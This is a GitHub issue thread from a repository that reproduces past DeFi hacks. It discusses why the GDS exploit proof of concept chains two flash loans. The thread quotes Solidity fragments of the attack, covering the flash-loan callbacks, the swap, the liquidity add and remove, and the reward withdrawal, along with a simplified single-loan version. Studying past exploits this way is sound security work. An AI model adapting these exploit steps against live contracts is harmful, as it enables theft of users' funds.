SunWeb3Sec/DeFiHackLabs

in GDS_exp POC, why call twice flashLoan?

guange2015 opened this issue · 2 comments

when i test it, once is enough

https://github.com/SunWeb3Sec/DeFiHackLabs/blob/main/src/test/GDS_exp.sol#L104

 function executeOperation(
        address pool,
        address token,
        uint256 amount,
        uint256 fee,
        bytes calldata params
    ) external{
        DODOFLashLoan();
        USDT.transfer(address(swapFlashLoan), SwapFlashLoanAmount * 10000 / 9992 + 1000);
    }

    function DODOFLashLoan() internal{
        dodoFlashLoanAmount = USDT.balanceOf(dodo);
        DVM(dodo).flashLoan(0, dodoFlashLoanAmount, address(this), new bytes(1));
    }

    function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external{
        USDTToGDS(600_000 * 1e18);
        GDSUSDTAddLiquidity(USDT.balanceOf(address(this)), GDS.balanceOf(address(this)));
        WithdrawRewardFactory();
        GDSUSDTRemovLiquidity();
        GDSToUSDT();
        USDT.transfer(dodo, dodoFlashLoanAmount);
    }

change like this

 function executeOperation(
        address pool,
        address token,
        uint256 amount,
        uint256 fee,
        bytes calldata params
    ) external{
        USDTToGDS(600_000 * 1e18);
        GDSUSDTAddLiquidity(USDT.balanceOf(address(this)), GDS.balanceOf(address(this)));
        WithdrawRewardFactory();
        GDSUSDTRemovLiquidity();
        GDSToUSDT();
        USDT.transfer(address(swapFlashLoan), SwapFlashLoanAmount * 10000 / 9992 + 1000);
    }

Sorry, I did not carefully check the specific amount of usdt required in the attack, I just hope to imitate the attacker's behavior as accurately as possible

Goodjob, Thank you for clearing my doubts.